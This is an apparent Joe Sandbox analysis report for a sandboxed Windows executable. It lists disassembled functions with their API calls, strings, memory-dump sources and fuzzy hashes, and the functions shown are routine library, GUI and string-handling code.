API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 8b8f746b571a48bb98932253f11cfb9a6d50714f6a7a8b18c1f804bb224a4a34
Instruction ID: 1705ae94649cfcdec07a2c4afb9325e134b3648a90c66a64bc40c3e1f623d720
Opcode Fuzzy Hash: 8b8f746b571a48bb98932253f11cfb9a6d50714f6a7a8b18c1f804bb224a4a34
Instruction Fuzzy Hash: 9D110372500205BBDB306F69CE28A6F7A25DF0C311F04A437ED01962A6C6FCCF01CA98

Function 0040E580 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66windowlibrarystringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040E598
FormatMessageA.KERNEL32(00000900,00000000,?,00000800,?,00000000,00000000), ref: 0040E5C2
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,?,00000000,00000000), ref: 0040E5E1
FreeLibrary.KERNEL32(00000000), ref: 0040E5F0
lstrcpynA.KERNEL32(?,?,?), ref: 0040E60D
LocalFree.KERNEL32(?), ref: 0040E61D
FreeLibrary.KERNEL32(00000000), ref: 0040E624

Strings

PDH.DLL, xrefs: 0040E593

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FreeLibrary$FormatMessage$LoadLocallstrcpyn
String ID: PDH.DLL
API String ID: 1063927503-1445698968
Opcode ID: f70fa2791abe4299b63626bd1457c107f1bc956281a74d87e74dbd3153c6045f
Instruction ID: 0d14a0034f80405ac917444b7c10517cac89a159e016af290fe5fb89c13455c3
Opcode Fuzzy Hash: f70fa2791abe4299b63626bd1457c107f1bc956281a74d87e74dbd3153c6045f
Instruction Fuzzy Hash: 59112176744311AFE210CB95DC55F6BB7A8ABC8B92F104829FA44DB291D6B0EC0487B5

Function 00434BFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 00434C19
GetStockObject.GDI32(0000000D), ref: 00434C21
GetObjectA.GDI32(00000000,0000003C,?), ref: 00434C2E
GetDC.USER32(00000000), ref: 00434C3D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00434C54
MulDiv.KERNEL32(?,00000048,00000000), ref: 00434C60
ReleaseDC.USER32(00000000,00000000), ref: 00434C6B

Strings

System, xrefs: 00434C12, 00434C81

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 35a52603dc629c1df6a249456c6161fa8598e68f248e1472248b513c8ae3e799
Instruction ID: 87ce63241769ee721b4d8e36d5e0ad9c297704b693e573ad121b0a2c6eb9686c
Opcode Fuzzy Hash: 35a52603dc629c1df6a249456c6161fa8598e68f248e1472248b513c8ae3e799
Instruction Fuzzy Hash: 70117331A41718BFEB009BA18C55FAE7EB8EB49746F005026FA05E6291DB74DD018BA9

Function 00423714 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00420D35,?,Microsoft Visual C++ Runtime Library,00012010,?,0045C4F0,?,0045C540,?,?,?,Runtime Error!Program: ), ref: 00423726
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0042373E
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042374F
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042375C

Strings

GetActiveWindow, xrefs: 00423749
GetLastActivePopup, xrefs: 00423751
user32.dll, xrefs: 00423721
MessageBoxA, xrefs: 00423738

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 332985a51f233dddc1e4fe9e9e5c4897b39bd3a4c5c5707d3ccef61ce5641e1a
Instruction ID: 15311a05dc551ee77f09065562aa6212b857bf477fa2f19b58a165f6bf1f5b04
Opcode Fuzzy Hash: 332985a51f233dddc1e4fe9e9e5c4897b39bd3a4c5c5707d3ccef61ce5641e1a
Instruction Fuzzy Hash: C70175F1B01311AF8B109FB5ACC49277AF8AED9757705443BE508C2121E7BCCA089B5D

Function 00433225 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,0043351F,?,00020000), ref: 0043322E
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 00433237
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0043324B
#17.COMCTL32 ref: 00433266
#17.COMCTL32 ref: 00433282
FreeLibrary.KERNEL32(00000000), ref: 0043328E

Strings

InitCommonControlsEx, xrefs: 00433243
COMCTL32.DLL, xrefs: 00433227, 0043322D, 00433234

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: 370a978960c351e9a1a39bbde176c08d10df7348ceadf84fc7722e27ac3df3f7
Instruction ID: aef1743121d51ce7f427e7c077a6afabfe10d89c1ed5be7f18dd3fa48c2d2127
Opcode Fuzzy Hash: 370a978960c351e9a1a39bbde176c08d10df7348ceadf84fc7722e27ac3df3f7
Instruction Fuzzy Hash: 92F0A4336007129B87115FA4AC4892B73A8AB98BA3B15047AFC04E3211DB68DD0987A9

Function 0040BD70 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,OldMenuProc), ref: 0040BD7C
SetLastError.KERNEL32(00000000), ref: 0040BD86
SetWindowLongA.USER32(?,000000FC,00000000), ref: 0040BD90
RemovePropA.USER32(?,OldMenuProc), ref: 0040BDA5
GlobalFindAtomA.KERNEL32(OldMenuProc), ref: 0040BDB0
GlobalDeleteAtom.KERNEL32(00000000), ref: 0040BDB7

Part of subcall function 00405E30: GetLastError.KERNEL32(00000000,000000FF,00405D41), ref: 00405E49
Part of subcall function 00405E30: FormatMessageA.KERNEL32 ref: 00405E77
Part of subcall function 00405E30: MessageBoxA.USER32(00000000,?,Error,00000040), ref: 00405E8F
Part of subcall function 00405E30: LocalFree.KERNEL32(?), ref: 00405E9A

Strings

@iE, xrefs: 0040BDD9
OldMenuProc, xrefs: 0040BD76, 0040BD9F, 0040BDAB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AtomErrorGlobalLastMessageProp$DeleteFindFormatFreeLocalLongRemoveWindow
String ID: @iE$OldMenuProc
API String ID: 1123624432-3383644750
Opcode ID: 99e1ca273890a9526a1cf1ca3e34fa05ced70ed0b3efd31e16c61312dec9462f
Instruction ID: 15990195344a25ec2deb9b2c4aa457ebf9f42cc8895f889e29bcf810cbbc0586
Opcode Fuzzy Hash: 99e1ca273890a9526a1cf1ca3e34fa05ced70ed0b3efd31e16c61312dec9462f
Instruction Fuzzy Hash: 40F0C8321016207BC20037B5EC1DDAF36A9DF86723B55013AF50AD71A2DB7C990187EE

Function 004250F4 Relevance: 13.7, APIs: 9, Instructions: 221COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,0045C580,00000001,0045C580,00000001,00000000,022F0E6C,00000001,?,0042111F,0041B374,00000000,?,?,0041B1E7), ref: 00425132
CompareStringA.KERNEL32(00000000,00000000,0045C57C,00000001,0045C57C,00000001,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 0042514F
CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,0041B1E7,?,00000000,022F0E6C,00000001,?,0042111F,0041B374,00000000,?,?,0041B1E7), ref: 004251AD
GetCPInfo.KERNEL32(?,00000000,00000000,022F0E6C,00000001,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 004251FE
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 0042527D
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 004252DE
MultiByteToWideChar.KERNEL32(?,00000009,0041B1E7,?,00000000,00000000,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 004252F1
MultiByteToWideChar.KERNEL32(?,00000001,0041B1E7,?,?,00000000,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 0042533D
CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,0042111F,0041B374,00000000,?,?,0041B1E7,00000000), ref: 00425355

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: ff8db32234344bd0dad0c65b6bb85a19970e6c053ed3fa80096a1257a8fa9aff
Instruction ID: 1ae6a6fb9a562f6a9246e9cd47b87c5a48459a290156db66aba117f61cd5ab1c
Opcode Fuzzy Hash: ff8db32234344bd0dad0c65b6bb85a19970e6c053ed3fa80096a1257a8fa9aff
Instruction Fuzzy Hash: 3771B031A00669EFCF219F50AC41AEF7FB9EB09390F54006BF950A2261D3798D61CF69

Function 00420E7A Relevance: 13.7, APIs: 9, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,0045C580,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00420EBC
LCMapStringA.KERNEL32(00000000,00000100,0045C57C,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00420ED8
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00420F21
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00420F59
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00420FB1
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00420FC7
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00420FFA
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00421062

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 01c4635fd409993d606edbf872f04d0760f0b734e3d7c891184548daae18bda8
Instruction ID: 08929138b6becb3025c53b217cbe2b219d365e2ae37b2e161de4cc6054719eea
Opcode Fuzzy Hash: 01c4635fd409993d606edbf872f04d0760f0b734e3d7c891184548daae18bda8
Instruction Fuzzy Hash: E451CD31A00659FFCF218F94DC44AEF7FB4FB58745F60012AF910A2260D33A9990DB68

Function 0040B5F0 Relevance: 13.6, APIs: 9, Instructions: 139COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0040B639

Part of subcall function 00405F10: KiUserCallbackDispatcher.NTDLL(00001024,00000000,?,00000000), ref: 00405F27

GetSysColor.USER32(00000004), ref: 0040B687
GetSysColor.USER32(00000004), ref: 0040B691
GetSysColor.USER32(0000000D), ref: 0040B6BA
GetSysColor.USER32(0000000D), ref: 0040B6BF

Part of subcall function 0040AFF0: GetWindowRect.USER32(?,?), ref: 0040B00E
Part of subcall function 0040AFF0: GetWindowDC.USER32(00000000), ref: 0040B032
Part of subcall function 0040AFF0: GetPixel.GDI32(00000000,?,00000000), ref: 0040B0A9
Part of subcall function 0040AFF0: SetPixel.GDI32(?,?,00000000,00000000), ref: 0040B0B7
Part of subcall function 0040AFF0: GetPixel.GDI32(00000000,?,00000004), ref: 0040B0E8
Part of subcall function 0040AFF0: SetPixel.GDI32(?,?,?,00000000), ref: 0040B104

GetSysColor.USER32(00000004), ref: 0040B71F
GetSysColor.USER32(00000004), ref: 0040B729
GetSysColor.USER32(0000000D), ref: 0040B74C
GetSysColor.USER32(0000000D), ref: 0040B751

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$Pixel$Window$Rect$CallbackDispatcherUser
String ID:
API String ID: 2868502407-0
Opcode ID: 9dd62640e3f6fd2825e2cf43d1c0b87f9f4f3efc93ff23a5fdc4847862e5a4b6
Instruction ID: 2a2fac9858b0170e8e1b1dbfc1f4ccc25d5c6f8412f9b5742a2064ab43464eb9
Opcode Fuzzy Hash: 9dd62640e3f6fd2825e2cf43d1c0b87f9f4f3efc93ff23a5fdc4847862e5a4b6
Instruction Fuzzy Hash: 11415EB1619300AFD344DF29D8C0A6FB7E8EBC8314F004A2EF849D7250EB75D9458B6A

Function 0040B7E0 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0040B829

Part of subcall function 00405F10: KiUserCallbackDispatcher.NTDLL(00001024,00000000,?,00000000), ref: 00405F27

GetSysColor.USER32(00000005), ref: 0040B873
GetSysColor.USER32(00000005), ref: 0040B878
GetSysColor.USER32(0000000D), ref: 0040B8A1
GetSysColor.USER32(0000000D), ref: 0040B8A6

Part of subcall function 0040AFF0: GetWindowRect.USER32(?,?), ref: 0040B00E
Part of subcall function 0040AFF0: GetWindowDC.USER32(00000000), ref: 0040B032
Part of subcall function 0040AFF0: GetPixel.GDI32(00000000,?,00000000), ref: 0040B0A9
Part of subcall function 0040AFF0: SetPixel.GDI32(?,?,00000000,00000000), ref: 0040B0B7
Part of subcall function 0040AFF0: GetPixel.GDI32(00000000,?,00000004), ref: 0040B0E8
Part of subcall function 0040AFF0: SetPixel.GDI32(?,?,?,00000000), ref: 0040B104

GetSysColor.USER32(00000005), ref: 0040B8F4
GetSysColor.USER32(00000005), ref: 0040B8F9
GetSysColor.USER32(0000000D), ref: 0040B91C
GetSysColor.USER32(0000000D), ref: 0040B921

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$Pixel$Window$Rect$CallbackDispatcherUser
String ID:
API String ID: 2868502407-0
Opcode ID: e80867e34650bf62cc8616527b5fd4fb883bcf781addc3c20cadded8ce9a4da6
Instruction ID: 0df742c688c1c928d2efbd4202fc51aaade2f20f3867fcc0bc4ef009992b6654
Opcode Fuzzy Hash: e80867e34650bf62cc8616527b5fd4fb883bcf781addc3c20cadded8ce9a4da6
Instruction Fuzzy Hash: 6E414BB1608304AFD344DF69C880A2FB7E8FBC8714F004A2EF98997280DB74DD058B66

Function 004298A0 Relevance: 13.6, APIs: 9, Instructions: 128threadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004298A7
EnterCriticalSection.KERNEL32(0046F280), ref: 004298B4
LeaveCriticalSection.KERNEL32(0046F280), ref: 004298FC
CallNextHookEx.USER32(00000000,?,?,?), ref: 00429913
LeaveCriticalSection.KERNEL32(0046F280), ref: 0042992E
GetWindowLongA.USER32(?,000000F0), ref: 00429972
SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 00429999
GetParent.USER32(?), ref: 00429A01
CallNextHookEx.USER32(00000000,?,?,?), ref: 00429A3E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
String ID:
API String ID: 1151315845-0
Opcode ID: e78560f745205e04566cfa48dfe5d5649f1117b238f902184d12f8e1f8c951ea
Instruction ID: 5525ff2bf9ae05dac82b11ae5224790ba0f89919428a2a4a50b49d8d2d43920a
Opcode Fuzzy Hash: e78560f745205e04566cfa48dfe5d5649f1117b238f902184d12f8e1f8c951ea
Instruction Fuzzy Hash: 1A41D0B5B013219BD704DB10FC45B6B73A4BB04724F84007AF89182252E7B9AC88CB6E

Function 004407E7 Relevance: 13.6, APIs: 9, Instructions: 127timekeyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000001), ref: 004407F3
GetCursorPos.USER32(?), ref: 00440811
ScreenToClient.USER32(?,?), ref: 0044081E
GetCapture.USER32 ref: 0044086E

Part of subcall function 0043393A: IsWindowEnabled.USER32(?), ref: 00433944

ClientToScreen.USER32(?,?), ref: 004408B8
WindowFromPoint.USER32(?,?), ref: 004408C4
IsChild.USER32(?,00000000), ref: 004408D9
KillTimer.USER32(?,0000E001), ref: 0044091F
KillTimer.USER32(?,0000E000), ref: 0044093C

Part of subcall function 00431E9F: GetForegroundWindow.USER32(00000000,?,0044084A), ref: 00431EA3
Part of subcall function 00431E9F: GetLastActivePopup.USER32(?), ref: 00431EBB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: 5612b963d9094784ad73a4c13b9be478916b2b3acbf38351d42e56bc2b42bf37
Instruction ID: 65d1703974a24614bd549e6cadb64d78076b4028e4736c835f7beb2323bb8a25
Opcode Fuzzy Hash: 5612b963d9094784ad73a4c13b9be478916b2b3acbf38351d42e56bc2b42bf37
Instruction Fuzzy Hash: 5241C330600605EFEB20AF65CD48A6E7BB5AF44314F20466AE551D72E1DB38D9518B48

Function 0042FE0C Relevance: 13.6, APIs: 9, Instructions: 113COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042FE11
FindResourceA.KERNEL32(?,00000000,00000005), ref: 0042FE49
LoadResource.KERNEL32(?,00000000), ref: 0042FE51

Part of subcall function 00430D3B: UnhookWindowsHookEx.USER32(?), ref: 00430D60

LockResource.KERNEL32(?), ref: 0042FE5E
IsWindowEnabled.USER32(?), ref: 0042FE91
EnableWindow.USER32(?,00000000), ref: 0042FE9F
EnableWindow.USER32(?,00000001), ref: 0042FF2D
GetActiveWindow.USER32 ref: 0042FF38
SetActiveWindow.USER32(?), ref: 0042FF46

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: a99f1db94932ddbe9cc34ff7bfec9737c4a3f9d0ddf5b2a3ce1df37916c20a2e
Instruction ID: 996aee52b406c4767d96c783df9556b01d050838416dfbd32c279c611ede250e
Opcode Fuzzy Hash: a99f1db94932ddbe9cc34ff7bfec9737c4a3f9d0ddf5b2a3ce1df37916c20a2e
Instruction Fuzzy Hash: 7541E330A007249FCB21AF64E90567FBBB5AF44712F91013BE502A22A2CB798D45CB59

Function 0043C103 Relevance: 13.6, APIs: 9, Instructions: 111windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043C108
GetSystemMenu.USER32(?,00000000), ref: 0043C17C
DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0043C19A
DeleteMenu.USER32(?,0000F020,00000000), ref: 0043C1A6
DeleteMenu.USER32(?,0000F030,00000000), ref: 0043C1B2
DeleteMenu.USER32(?,0000F120,00000000), ref: 0043C1BE
DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0043C1E7
AppendMenuA.USER32(?,00000000,0000F060,?), ref: 0043C1F6
SetParent.USER32(?,?), ref: 0043C233

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

